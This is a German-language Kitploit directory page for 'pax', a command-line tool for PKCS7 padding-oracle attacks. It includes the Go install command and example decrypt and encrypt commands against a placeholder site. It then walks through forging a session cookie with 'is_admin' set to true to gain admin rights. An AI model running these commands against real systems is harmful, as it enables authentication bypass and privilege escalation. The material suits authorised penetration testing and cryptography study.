Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
pax — :skull: :unlock: CLI-Tool für PKCS7 Padding-Oracle-Angriffe | Kitploit
Tools/GitHubGitHub/liamg/pax
ExploitationWebanwendungs-ExploitationKryptographiePenetrationstests
GitHubliamg/pax

pax

💀 🔓 CLI-Tool für PKCS7 Padding-Oracle-Angriffe

Repository anzeigen
14217vor 5 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

pax

Travis Build Status GoReportCard

Padding-Orakel für Spaß und Gewinn ausnutzen!

Pax (PAdding oracle eXploiter) ist ein Tool zum Ausnutzen von Padding-Orakeln, um Folgendes zu erreichen:

  1. Klartext für ein bestimmtes Stück CBC-verschlüsselter Daten zu erhalten.
  2. Verschlüsselte Bytes für ein bestimmtes Stück Klartext zu erhalten, unter Verwendung des unbekannten Verschlüsselungsalgorithmus, den das Orakel verwendet.

Dies kann verwendet werden, um verschlüsselte Sitzungsinformationen offenzulegen und oft Authentifizierung zu umgehen, Berechtigungen zu erhöhen und Code remote auszuführen, indem benutzerdefinierter Klartext verschlüsselt und an den Server zurückgeschrieben wird.

Wie immer sollte dieses Tool nur auf Systemen verwendet werden, die Ihnen gehören und/oder für die Sie die Erlaubnis zum Testen haben!

Installation

Laden Sie es von den Releases herunter, oder installieren Sie es mit Go:

root@kitploit:~
go get -u github.com/liamg/pax/cmd/pax

Beispielnutzung

Wenn Sie ein vermutetes Orakel finden, bei dem die verschlüsselten Daten in einem Cookie namens SESS gespeichert sind, können Sie Folgendes verwenden:

root@kitploit:~
pax decrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D"

Dies wird hoffentlich etwas Klartext liefern, vielleicht so etwas wie:

root@kitploit:~
 {"user_id": 456, "is_admin": false}

Es sieht so aus, als könnten Sie hier Ihre Berechtigungen erhöhen!

Sie können dies versuchen, indem Sie zunächst Ihre eigenen verschlüsselten Daten generieren, die das Orakel wieder in einen hinterhältigen Klartext entschlüsselt:

root@kitploit:~
pax encrypt --url https://target.site/profile.php --sample Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D --block-size 16 --cookies "SESS=Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg%3D%3D" --plain-text '{"user_id": 456, "is_admin": true}'

Dies wird einen weiteren base64-codierten Satz verschlüsselter Daten ausgeben, vielleicht so etwas wie:

root@kitploit:~
dGhpcyBpcyBqdXN0IGFuIGV4YW1wbGU=

Jetzt können Sie Ihren Browser öffnen und den Wert des SESS-Cookies auf den obigen Wert setzen. Wenn Sie die ursprüngliche Orakelseite laden, sollten Sie sehen, dass Sie auf Admin-Ebene angehoben wurden.

Wie funktioniert das?

Die folgenden Anleitungen erklären diesen Angriff hervorragend:

  • https://robertheaton.com/2013/07/29/padding-oracle-attack/
  • https://blog.skullsecurity.org/2013/padding-oracle-attacks-in-depth
Tool herunterladen